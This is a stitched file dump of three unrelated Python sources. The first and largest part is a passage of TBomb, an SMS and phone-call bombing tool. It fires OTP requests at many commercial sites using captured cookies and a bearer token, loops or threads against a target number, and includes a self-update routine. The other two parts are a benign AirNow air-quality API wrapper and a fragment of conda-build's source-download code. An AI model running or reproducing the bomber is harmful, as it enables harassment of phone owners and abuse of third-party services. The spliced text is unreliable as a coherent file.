'curl -s -X POST -H "Host:m.pizzahut.co.in" -H "content-length:114" -H "origin:https://m.pizzahut.co.in" -H "authorization:Bearer ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0luUnZhMlZ1SWpvaWIzQXhiR0pyZEcxbGRYSTBNWEJyTlRGNWNqQjBkbUZsSWl3aVlYVjBhQ0k2SW1WNVNqQmxXRUZwVDJsS1MxWXhVV2xNUTBwb1lrZGphVTlwU2tsVmVra3hUbWxLT1M1bGVVcDFXVmN4YkdGWFVXbFBhVWt3VGtSbmFVeERTbmRqYld4MFdWaEtOVm96U25aa1dFSjZZVmRSYVU5cFNUVlBSMUY0VDBkUk5FMXBNV2xaVkZVMVRGUlJOVTVVWTNSUFYwMDFUV2t3ZWxwcVp6Vk5ha0V6V1ZSTk1GcHFXV2xNUTBwd1l6Tk5hVTlwU205a1NGSjNUMms0ZG1RelpETk1iVEZvWTI1U2NWbFhUbkpNYlU1MllsTTVhMXBZV214aVJ6bDNXbGhLYUdOSGEybE1RMHBvWkZkUmFVOXBTbTlrU0ZKM1QyazRkbVF6WkROTWJURm9ZMjVTY1ZsWFRuSk1iVTUyWWxNNWExcFlXbXhpUnpsM1dsaEthR05IYTJsTVEwcHNaVWhCYVU5cVJURk9WR3MxVG5wak1VMUVVWE5KYlRWcFdtbEpOazFVVlRGUFZHc3pUWHByZDA1SU1DNVRaM1p4UmxOZldtTTNaSE5pTVdSNGJWVkdkSEExYW5WMk9FNTVWekIyZDE5TVRuTkJNbWhGVkV0eklpd2lkWEJrWVhSbFpDSTZNVFUxT1RrM016a3dORFUxTnl3aWRYTmxja2xrSWpvaU1EQXdNREF3TURBdE1EQXdNQzB3TURBd0xUQXdNREF0TURBd01EQXdNREF3TURBd0lpd2laMlZ1WlhKaGRHVmtJam94TlRVNU9UY3pPVEEwTlRVM2ZTd2lhV0YwSWpveE5UVTVPVGN6T1RBMExDSmxlSEFpT2pFMU5qQTRNemM1TURSOS5CMGR1NFlEQVptTGNUM0ZHM0RpSnQxN3RzRGlJaVZkUFl4ZHIyVzltenk4" -H "x-source-origin:PWAFW" -H "content-type:application/json" -H "accept:application/json, text/plain, */*" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "save-data:on" -H "languagecode:en" -H "referer:https://m.pizzahut.co.in/login" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_fbp=fb.2.1559973905081.1516144968" -H "cookie:_gat_UA-37858192-4=1" -H "cookie:_ga-ss=1|UA-37858192-4|https%3A%2F%2Fwww.google.com%2F" -H "cookie:_gid=GA1.3.1666290082.1559973902" -H "cookie:_ga=GA1.3.1893416092.1559973902" -H "cookie:run_fullstory_for_user=full_story_fail" -H "cookie:_gcl_au=1.1.2020385110.1559973902" -H "cookie:AKA_A2=A" -d \'{"customer":{"MobileNo":"' + pn + '","UserName":"' + pn + '","merchantId":"98d18d82-ba59-4957-9c92-3f89207a34f6"}}\' "https://m.pizzahut.co.in/api/cart/send-otp?langCode=en" > /dev/null 2>&1')
return True
elif lim == 11:
os.system('curl -s -X POST -H "host:www.goibibo.com" -H "user-agent:Mozilla/5.0 (Windows NT 8.0; Win32; x32; rv:58.0) Gecko/20100101 Firefox/57.0" -H "accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.goibibo.com/mobile/?sms=success" -H "content-type:application/x-www-form-urlencoded" -H "content-length:14" -H "connection:keep-alive" -H "upgrade-insecure-requests:1" -d "mbl=' + pn + '" "https://www.goibibo.com/common/downloadsms/" > /dev/null 2>&1')
return True
elif lim == 12:
os.popen('rm temp.xxx1 > /dev/null 2>&1')
os.system(
'curl -s -X POST -H "Host:www.apollopharmacy.in" -H "content-length:17" -H "accept:*/*" -H "origin:https://www.apollopharmacy.in" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.apollopharmacy.in/sociallogin/mobile/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:__cfduid=d64c65a2edad54086382759cdf599de901558686615" -H "cookie:_ga=GA1.2.1278908803.1558686621" -H "cookie:__ta_device=fAz8eA9Rx40yyIiB5mzvHt4apFaSkMBA" -H "cookie:_fbp=fb.1.1558686627127.655454618" -H "cookie:__stat="BLOCK"" -H "cookie:jv_visits_count_EXRKNIzFkV=1" -H "cookie:__stp={"visit":"returning","uuid":"d9a1c39d-efbd-4911-ac0e-6333455f9fbb"}" -H "cookie:PHPSESSID=vnj2hvk8nga4v1m2hvlmvl88r4" -H "cookie:_gid=GA1.2.132668726.1560239715" -H "cookie:_gat=1" -H "cookie:__ta_visit=f5uvpYKu8EVmJAJmFGXMmXGSTiNQSWRS" -H "cookie:_gat_UA-31142855-1=1" -H "cookie:__ta_ping=1" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-messages=" -H "cookie:private_content_version=46e6c8611a9b0d06e662da50ca5cf311" -H "cookie:AWSALB=2177QHjXXrFgaem1w0FrBqZ2aoKrMhI+DibolJaee9cVOP4ZSV2LiLC3tks68ud4ERCydxa8kb4klbiI+VEnNQB0rsyins1USgvHcPOUoz2nySN3SC5G/wpAACIq" -H "cookie:section_data_ids=%7B%22cart%22%3A1560239751%7D" -d \'mobile=' + pn + '\' "https://www.apollopharmacy.in/sociallogin/mobile/sendotp/" --output temp.xxx1')
while not os.path.exists('temp.xxx1'):
time.sleep(0.1)
rd = str(open('temp.xxx1', 'rb').read()) + " "
return rd.find("sent") != -1
elif lim == 13:
rd = ' '
try:
rd = os.popen(
' curl -s -X POST -H "Host:www.ajio.com" -H "Connection:keep-alive" -H "Content-Length:144" -H "Accept:application/json" -H "Origin:https://www.ajio.com" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "Referer:https://www.ajio.com/signup" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:_ga=GA1.2.979928319.1560364071; _gid=GA1.2.666270216.1560364071; V=201; _fbp=fb.1.1560364076913.1528349725; cto_lwid=d91bea3a-7610-45aa-8f78-65a0d740fb46; PushSubscriberStatus=DENIED; peclosed=true; G_ENABLED_IDPS=google; TS018cc593=01ef61aed0fca110f50d8e3be2c66eb83188f6df8495c0ed2cd772829370fc12690954aad0834f545b57764467dbb66efb05d481a8958aebb273751956ef9eb383a3ba22dd1c94d82021e9d4c40011d4ab9bd97c6f0a74628ac12e8f7bcb663c1608e7288ebd252051cb84def3b021d3bcf643d3f3728ca9c0d9c780d171578ba966774f11ac44864a7f3da59791cb55f2741f23d72f7843efe9306459c00ec2e5f00065729a8573baba42384bb7cf46eb55cf89f72f1dcd5619a26e4ff32c63d06cac8c4bb158da6640bc0b11193134cbf38050ae0db230aa258b1181749fb0373afe041ad1aeffd0c08be7a62010db02cc65edfb1341d2de54cdf475c5dcd84e16c64c50; _gac_UA-68002030-1=1.1560366197.Cj0KCQjwxYLoBRCxARIsAEf16-tx5UXrrP9SEhR8dPkTL4a9woEF7Ae-kvSlzKdgq35y31DeK3_uhg8aAkRBEALw_wcB; cdigiMrkt=utm_source%3A%7Cutm_medium%3A%7Cdevice%3Amobile%7Cexpires%3AFri%2C%2012%20Jul%202019%2019%3A03%3A17%20GMT%7C; ImpressionCookie=4; ip=10.1.10.1; sessionStatus=true|undefined; FirstPage=Thu Jun 13 2019 00:33:53 GMT+0530 (India Standard Time); _dc_gtm_UA-68002030-1=1; uI=johnyaho%40gmail.com; TS01fe4249=01ef61aed09c32c6a53ce9e431a6a719c416867f2f3ad713fde2e74175bc248acc7a523f41e9751d032859a159bfff87664b90c3d0a9dfb2392f75876ccbe273b8a8e81d7a8d25047453c17a2905eca7eff26b780c" -d \'{"firstName":"Rox","login":"johnyaho@gmail.com","password":"Rock@5star","genderType":"Male","mobileNumber":"' + pn + '","requestType":"SENDOTP"}\' "https://www.ajio.com/api/auth/signupSendOTP" ').read()
except Exception:
return True
if rd.find("\"statusCode\":\"1\"") != -1:
return True
else:
return False
elif lim == 14:
con = '{"country_code":"' + cc + '","phone_number":"' + pn + '"}'
os.popen('rm temp.xxx2 > /dev/null 2>&1')
os.system('curl -s -X POST -H "Host:api.cloud.altbalaji.com" -H "Connection:keep-alive" -H "Content-Length:' + str(len(con)) +
'" -H "Accept:application/json, text/plain, */*" -H "Origin:https://lite.altbalaji.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Mobile Safari/537.36" -H "Content-Type:application/json;charset=UTF-8" -H "Referer:https://lite.altbalaji.com/subscribe?progress=input" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -d \'' + con + '\' "https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN" -o temp.xxx2')
while not os.path.exists('temp.xxx2'):
time.sleep(0.1)
rd = hashlib.md5(open('temp.xxx2', 'rb').read()).hexdigest()
return rd == '24f467b24087ff48c96321786d89c69f'
elif lim == 15:
rd = os.popen('curl -s -X POST -H "Host:www.aala.com" -H "Connection:keep-alive" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Origin:https://www.aala.com" -H "X-Requested-With:XMLHttpRequest" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "Referer:https://www.aala.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6,ar;q=0.5" -H "Cookie:frontend=a27mn3h3irt1rlt6i55s93p9r5; frontend_cid=8zqBBzwQTMIt9UKg; _BEAMER_USER_ID_gADrycBn12870=c9fe4f7d-b421-4bad-9cf2-0a4db716dff4; G_ENABLED_IDPS=google" -d \'email=' + cc + pn + '&firstname=SpeedX&lastname=SpeedX\' "https://www.aala.com/accustomer/ajax/getOTP"').read().strip()
return rd.find('code:') != -1
elif lim == 16:
os.popen('curl -s -X POST -d \'method=SMS&countryCode=id&phoneNumber=' + cc + pn +
'&templateID=pax_android_production\' "https://api.grab.com/grabid/v1/phone/otp"')
return True
elif lim == 100:
rd = os.popen('curl -s -X GET "https://www.makaan.com/apis/nc/sendOtpOnCall/16257065/' +
pn + '?callType=otpOnCall"').read()
return rd.lower().find("new otp has been") != -1
elif lim == 101:
rd = os.popen('curl -s -X POST -d mobile=%2B' + cc + '-' + pn +
' https://marketing.tllms.com/elearn/api/v4/authentications/phone_call').read()
return rd.lower().find("otp requests exceeded") == -1
elif lim == 102:
rd = os.popen('curl -s -X POST -H "Host:www.realestateindia.com" -H "content-length:58" -H "accept:text/html, */*; q=0.01" -H "origin:https://www.realestateindia.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.realestateindia.com/thanks.php?newreg" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_gat=1" -H "cookie:rei_mem_mobile_verify_status=0" -H "cookie:rei_mem_email_verify_status=N" -H "cookie:rei_mem_block_status=0" -H "cookie:rei_member_country=IN" -H "cookie:rei_paid_status=0" -H "cookie:rei_member_type=1" -H "cookie:rei_member_email=Fakemam%40ril.com" -H "cookie:rei_member_name=Fakeman" -H "cookie:rei_member_id=1547045" -H "cookie:cooki_sess_id=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:name=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:_gid=GA1.2.626525909.1560836369" -H "cookie:_ga=GA1.2.1033079331.1560836369" -H "cookie:visitedToken=176961560836367" -d \'action_id=call_to_otp&mob_num=' + pn + '&member_id=1547045\' "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php?sid=0.5983221395805354"').read()
return rd.lower().find("y") != -1
elif lim == 103:
os.system(
'curl -s -X POST -H "Host:www.olx.in" -H "content-length:44" -H "accept:*/*" -H "x-newrelic-id:VQMGU1ZVDxABU1lbBgMDUlI=" -H "origin:https://www.olx.in" -H "user-agent:Mozilla/5.0 (Linux; Android 5.0.2; SH-04G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "referer:https://www.olx.in/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:onap=16b1b8f48d4x746d47ab-1-16b1b8f48d4x746d47ab-19-1559537345" -H "cookie:bm_sv=CDB97F50DA6615AC420F3E6E77B04E42~OoX2fAuP7ggcNa0VjzE95FzJNKRdJlW09Hja0/cysIGF1sJoBO7i0ndGXqnTWLaunlyxktHLbE8BSstPCRYn8VdP15lvUxK3ZY9ahXOSgwAidxwXd1jCe5wjIzYbiXp5eKNWfFpowhFbpxloe+SrbiE0YHJVPcCV5bmdsHgPfQc=" -H "cookie:AMP_TOKEN=%24NOT_FOUND" -H "cookie:hint=true" -H "cookie:_gid=GA1.2.369819276.1559535517" -H "cookie:_ga=GA1.2.665688753.1559535517" -H "cookie:ldTd=true" -H "cookie:G_ENABLED_IDPS=google" -H "cookie:HIDE_ONBOARDING_LOCATION=true" -H "cookie:testCookie=testCookie" -H "cookie:ak_bmsc=307C5311FB00A3F4E856AFFE1A9D000B0214BED9E0210000909FF45C1E802067~plFZfbMQGgEDr7OWVe9FvqfT24ZtOVMamtYcaip71IYOrv2+SQ6fokSvMk2Uesz5v1sFfaichbtDgeVSj3te3vXJKezSWgvoVWrK7gfzFrLz1ruBm0MQj01V5CmpaTr6tRgDRSN6bks3nqvOHzR0tA1IoqfDfq2MKtmDjbknCI5FlLYUTwqlnwHowYArfybn2n3yilE6VKHjW+tH8kqjAfH8BGuijpmO9pNkgmIyOeaZIVM3k6FGOL3Wj3jLI8uGaU" -H "cookie:_abck=153BD3D333948A58932748CAC3D4C3F40214BED9E0210000909FF45C18838E05~0~8O+udxdG38sBFTPZpaBL4IGj7eUcKJ1VwAtJ52GMO5E=~-1~-1" -H "cookie:bm_sz=BD665D919F7C6FA8374F196445596436~YAAQ2b4UArpOAwtrAQAAq0qPGwNksHBgphLwDzwfBlwIRQJAG7txmjBo/of7NiAJ93gy/7vBhQ9l5sIKdwtl2j+U4bys2Hhh5tZlZL/jqdnW/JrgmgawcxiunAJ32BbY9UtnFIrNxbbRvzQCYnSwf/cz9a7jURsui7leuLaVm7mQEcHPOtC6g5jrToAMTbdA" -H "cookie:97c09e2aabdfed89b87a3010d7f13c64=353b4f9fd82d26268ad11b2c1e9ae019" -H "cookie:lqstatus=1559536704" -H "cookie:laquesis=pan-26381@a#pan-27752@b#pan-30043@b#pana-26381@b" -d \'{"type":"call","descriptor":"+91' + pn + '"}\' "https://www.olx.in/api/challenges" >/dev/null 2>&1')
return True
elif lim == 104:
rd = os.popen('curl -s -X GET -H "Host:api.magicbricks.com" -H "Connection:keep-alive" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Safari/537.36" -H "Save-Data:on" -H "Accept:image/webp,image/apng,image/*,*/*;q=0.8" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" "https://api.magicbricks.com/bricks/verifyOnCall.html?mobile=' + pn + '"').read().decode('utf-8')
return rd.lower().strip().find('callmade') != -1
elif lim == 106:
rd = os.popen(
'curl -s "https://www.myupchar.com/user_profile/resend_otp_via_voice?id=' + pn + '"').read()
return rd.find("1") != -1
return False
def remsp(num):
num = num.replace(' ', '')
num = num.replace('-', '')
return num
def start(target, counter, delay, ch, cc):
clr()
banner()
failed = 0
requested = 0
success = int(requested) - int(failed)
bombs = int(counter) + 1
while success < (int(bombs)):
os.system('clear')
banner()
try:
api = random.choice(ch)
except Exception:
if cc == "91":
print('Sorry All APIs Have Expired Please Update TBomb')
input('Press Enter To Exit...')
exit()
else:
if success > 0:
print(
'\n\n\tWe Are Sorry To Say That Bombing Limit For Your Country Has Been Reached...')
print(
'\nWe Are Working Too Hard To Increase The International Limit...')
input(
'\nThis will help us to give support to your country fast...\n\nPress Enter To Exit...')
os.system('rm *.xxx* > /dev/null 2>&1')
print('\n\n')
banner()
exit()
else:
print('\n\n\tSorry Your Country is Not Supported...')
print(
'\t\tPlease Send A Mail To ggspeedx29@gmail.com To Let Us Know...')
input('Press Enter To Exit...')
exit()
print(random.choice(colors))
print("==================================================================")
print(" BOMBING in progress, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +" + str(cc) + " ", target)
print(" Number of Requests Sent : ", requested)
print(" Successful Requests : ", success)
print(" Failed Requests : ", failed)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By SpeedX !! ")
print("==================================================================")
try:
result = getapi(target, api, cc)
except Exception:
result = False
requested = requested + 1
if result:
success = success + 1
else:
failed = failed + 1
while ch.count(api) > 0:
ch.remove(api)
time.sleep(float(delay))
if requested % 3 == 0:
checkinternet()
print(W)
print('\n\nBombing Completed..')
os.system('rm *.xxx* > /dev/null 2>&1')
banner()
exit()
def update():
stuff_to_update = ['bomber.py', '.version']
for fl in stuff_to_update:
dat = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/" + fl).read()
file = open(fl, 'wb')
file.write(dat)
file.close()
print('\n\t\tUpdated Successfull !!!!')
print('\tPlease Run The Script Again...')
exit()
clr()
banner()
try:
urllib.request.urlopen('https://www.google.com')
except Exception:
print("You are not connected To Internet!!!")
print("\tPlease Connect To Internet To Continue...\n")
input('Exiting....\n Press Enter To Continue....')
exit()
print('\tChecking For Updates...')
ver = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.version").read().decode('utf-8')
verl = ''
try:
verl = open(".version", 'r').read()
except Exception:
pass
if ver != verl:
print('\n\t\tAn Update is Available....')
print('\tStarting Update...')
update()
print("Your Version is Up-To-Date")
print('\n\n\t\t\tStarting TBomb...\n\n')
try:
noti = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.notify").read().decode('utf-8')
noti = noti.upper().strip()
if len(noti) > 10:
print('\n\n\tNOTIFICATION: ' + noti + '\n\n')
except Exception:
pass
while True:
pn = ""
cc = input("\tEnter Your Country Code (Without +) : ")
if '+' in cc:
tc = list(cc)
tc.remove('+')
cc = ''.join(tc)
cc = cc.strip()
pn = input("\tEnter Target Number: +" + cc + " ")
pn = remsp(pn)
if len(cc) >= 4 or len(cc) < 1:
print('\n\nInvalid Country Code..\n\t\tCountry Codes Are Generally 1-3 digits...\n')
continue
if len(pn) <= 6:
print('\n\nInvalid Phone Number..\n')
continue
for cch in str(cc + pn):
if not cch.isdigit():
print('\n\nPhone Number Must Consist Of Numbers Only\n')
continue
break
type = 0
try:
if sys.argv[1] == "call":
type = 1
except Exception:
type = 0
if type == 1:
nm = int(input("Enter Number of Calls To Send(Maximum 15): "))
if nm > 15:
print("\t\tYou Have Entered " + str(nm) +
".\n\tNormalizing Value To 15")
nm = 15
dl = float(input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
elif type == 0:
if cc == "91":
nm = int(input("Enter Number of Messages To Send(0 For Unlimited): "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 2 sec ] : "))
else:
nm = int(input("Enter Number of Messages To Send: "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
maxlim = 0
if cc == "91":
maxlim = 500
else:
maxlim = 100
if nm > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
print('Number Of SMS Has been Set To ' + str(maxlim))
nm = maxlim
if not cc.strip() == "91":
if type == 1:
print(
'\t\tSorry But Call Bombing is Currently Supported Only For Indian Numbers!!!!')
print()
input('Press Enter To Exit....')
print('\n\n')
banner()
exit()
cnt = 0
if pn.strip() == '' or dl <= 0 or nm <= 0 or cc.strip() == '' or cc.find('+') != -1:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
ch = [0, 14, 15, 16]
start(pn, nm, dl, ch, str(cc))
exit()
ch = [i for i in range(17)]
cbomb = False
if pn.strip() == '' or dl <= 0 or nm < 0:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
if type == 1:
print("NOTE: Call Bomb Might Not Work on DND Activated Numbers...\n")
print("\n\tPlease Don't Overload Call Bomb So That Is Would Work For Longer Period Of Time...")
cbomb = True
if cbomb:
chl = [100, 101, 102, 103, 104, 105, 106]
start(pn, nm, dl, chl, str(cc))
exit()
if nm == 0:
nt = int(input("\tNumber Of Threads(10 to 20) : "))
if nt <= 0 or nt >= 30:
print('\tTBomb Shows Better Result in 10 to 25 Threads\n\t\tStill Continuing....')
print("\n\nPlease Remember That This Is in Experimental Stage And Is Incredibly Fast...")
t = [None] * nt
print(random.choice(colors))
print("\n\n==================================================================")
print(" Gearing Up Bomber, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +91", pn)
print(" Number of Threads : ", nt)
print(" Delay : ", dl)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By SpeedX !! ")
print("==================================================================")
print(W)
input('\n\nPress CTRL+Z To STOP Bomber... \nPress Enter To Start Bomber...\n')
os.system('rm *.xxx* > /dev/null 2>&1')
print("\n\nStarting Bomb....")
for i in range(nt):
t[i] = threading.Thread(target=infinite, args=(pn, dl, ch, maxlim,))
t[i].daemon = True
t[i].start()
time.sleep(2)
ci = 0
while True:
ci += 1
l = count_inf
print(" Total Number of Requests Sent : ", l)
if int(l) > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
input('Press Enter To Exit...')
os.system('rm *xxx* > /dev/null 2>&1')
banner()
exit()
time.sleep(1)
if ci % 3 == 0:
checkinternet()
else:
start(pn, nm, dl, ch, '91')
exit()
| 56.410138
| 2,211
| 0.611143
|
4a18f54bb8d2db5ae4294422029b6b66a0b1b488
| 1,623
|
py
|
Python
|
api.py
|
Demojh8/airnow
|
fce5fa150bb5e6f460dd91da70ca46edbd9c66ee
|
[
"MIT"
] | null | null | null |
api.py
|
Demojh8/airnow
|
fce5fa150bb5e6f460dd91da70ca46edbd9c66ee
|
[
"MIT"
] | null | null | null |
api.py
|
Demojh8/airnow
|
fce5fa150bb5e6f460dd91da70ca46edbd9c66ee
|
[
"MIT"
] | null | null | null |
import urllib2
import json
import datetime
class ApiBase:
def _makeRequest(self, url):
request = urllib2.Request(url)
opener = urllib2.build_opener()
response = opener.open(request)
responseStatusCode = response.getcode()
return response, responseStatusCode
class AirNow_Curr(ApiBase):
apiUrl = 'http://www.airnowapi.org/aq/observation/zipCode/current/?format'
def __init__(self, apiKey, format = 'application/json', distance = '25'):
self.apiKey = apiKey
self.format = format
self.distance = distance
def makeRequest(self, zipcode):
url = '%s=%s&zipCode=%s&distance=%s&API_KEY=%s' % (self.apiUrl, self.format, zipcode, self.distance, self.apiKey)
response, responseStatusCode = self._makeRequest(url)
jsonResponse = json.loads(response.read())
return jsonResponse, responseStatusCode
class AirNow_Pred(ApiBase):
apiUrl = 'http://www.airnowapi.org/aq/forecast/zipCode/?format'
def __init__(self, apiKey, format = 'application/json', distance = '25'):
self.apiKey = apiKey
self.format = format
self.distance = distance
def makeRequest(self, zipcode):
url = '%s=%s&zipCode=%s&date=%s&distance=%s&API_KEY=%s' % (self.apiUrl, self.format, zipcode,datetime.datetime.now().date().strftime("%Y-%m-%d"),self.distance, self.apiKey)
response, responseStatusCode = self._makeRequest(url)
jsonResponse = json.loads(response.read())
return jsonResponse, responseStatusCode
| 32.46
| 181
| 0.643869
|
4a18f746ee4fc2cb6de4e7ff6c365873a85b2726
| 26,833
|
py
|
Python
|
conda_build/source.py
|
gabm/conda-build
|
6720ae109a5d08737786d950687b9fdc48c05e16
|
[
"BSD-3-Clause"
] | null | null | null |
conda_build/source.py
|
gabm/conda-build
|
6720ae109a5d08737786d950687b9fdc48c05e16
|
[
"BSD-3-Clause"
] | null | null | null |
conda_build/source.py
|
gabm/conda-build
|
6720ae109a5d08737786d950687b9fdc48c05e16
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import, division, print_function
import io
import locale
import os
from os.path import join, isdir, isfile, abspath, basename, exists, normpath, expanduser
import re
import shutil
from subprocess import CalledProcessError
import sys
import time
from .conda_interface import download, TemporaryDirectory
from .conda_interface import hashsum_file
from conda_build.os_utils import external
from conda_build.conda_interface import url_path, CondaHTTPError
from conda_build.utils import (tar_xf, unzip, safe_print_unicode, copy_into, on_win, ensure_list,
check_output_env, check_call_env, convert_path_for_cygwin_or_msys2,
get_logger, rm_rf, LoggingContext)
if on_win:
from conda_build.utils import convert_unix_path_to_win
if sys.version_info[0] == 3:
from urllib.parse import urljoin
else:
from urlparse import urljoin
git_submod_re = re.compile(r'(?:.+)\.(.+)\.(?:.+)\s(.+)')
ext_re = re.compile(r"(.*?)(\.(?:tar\.)?[^.]+)$")
def append_hash_to_fn(fn, hash_value):
return ext_re.sub(r"\1_{}\2".format(hash_value[:10]), fn)
def download_to_cache(cache_folder, recipe_path, source_dict):
''' Download a source to the local cache. '''
print('Source cache directory is: %s' % cache_folder)
if not isdir(cache_folder):
os.makedirs(cache_folder)
fn = source_dict['fn'] if 'fn' in source_dict else basename(source_dict['url'])
hash_added = False
for hash_type in ('md5', 'sha1', 'sha256'):
if hash_type in source_dict:
fn = append_hash_to_fn(fn, source_dict[hash_type])
hash_added = True
break
else:
log = get_logger(__name__)
log.warn("No hash (md5, sha1, sha256) provided. Source download forced. "
"Add hash to recipe to use source cache.")
path = join(cache_folder, fn)
if isfile(path):
print('Found source in cache: %s' % fn)
else:
print('Downloading source to cache: %s' % fn)
if not isinstance(source_dict['url'], list):
source_dict['url'] = [source_dict['url']]
for url in source_dict['url']:
if "://" not in url:
if url.startswith('~'):
url = expanduser(url)
if not os.path.isabs(url):
url = os.path.normpath(os.path.join(recipe_path, url))
url = url_path(url)
else:
if url.startswith('file:///~'):
url = 'file:///' + expanduser(url[8:]).replace('\\', '/')
try:
print("Downloading %s" % url)
with LoggingContext():
download(url, path)
except CondaHTTPError as e:
print("Error: %s" % str(e).strip(), file=sys.stderr)
except RuntimeError as e:
print("Error: %s" % str(e).strip(), file=sys.stderr)
else:
print("Success")
break
else: # no break
raise RuntimeError("Could not download %s" % url)
hashed = None
for tp in ('md5', 'sha1', 'sha256'):
if 'tp' in source_dict:
expected_hash = source_dict[tp]
hashed = hashsum_file(path, tp)
if expected_hash != hashed:
raise RuntimeError("%s mismatch: '%s' != '%s'" %
(tp.upper(), hashed, expected_hash))
break
# this is really a fallback. If people don't provide the hash, we still need to prevent
# collisions in our source cache, but the end user will get no benefirt from the cache.
if not hash_added:
if not hashed:
hashed = hashsum_file(path, 'sha256')
dest_path = append_hash_to_fn(path, hashed)
os.rename(path, dest_path)
path = dest_path
return path
def hoist_single_extracted_folder(nested_folder):
"""Moves all files/folders one level up.
This is for when your archive extracts into its own folder, so that we don't need to
know exactly what that folder is called."""
flist = os.listdir(nested_folder)
parent = os.path.dirname(nested_folder)
for thing in flist:
if not os.path.isdir(os.path.join(parent, thing)):
shutil.move(os.path.join(nested_folder, thing), os.path.join(parent, thing))
else:
copy_into(os.path.join(nested_folder, thing), os.path.join(parent, thing))
nested_folder = os.path.join(nested_folder, thing)
rm_rf(nested_folder)
def unpack(source_dict, src_dir, cache_folder, recipe_path, croot, verbose=False,
timeout=90, locking=True):
''' Uncompress a downloaded source. '''
src_path = download_to_cache(cache_folder, recipe_path, source_dict)
if not isdir(src_dir):
os.makedirs(src_dir)
if verbose:
print("Extracting download")
with TemporaryDirectory(dir=croot) as tmpdir:
if src_path.lower().endswith(('.tar.gz', '.tar.bz2', '.tgz', '.tar.xz',
'.tar', 'tar.z')):
tar_xf(src_path, tmpdir)
elif src_path.lower().endswith('.zip'):
unzip(src_path, tmpdir)
elif src_path.lower().endswith('.whl'):
# copy wheel itself *and* unpack it
# This allows test_files or about.license_file to locate files in the wheel,
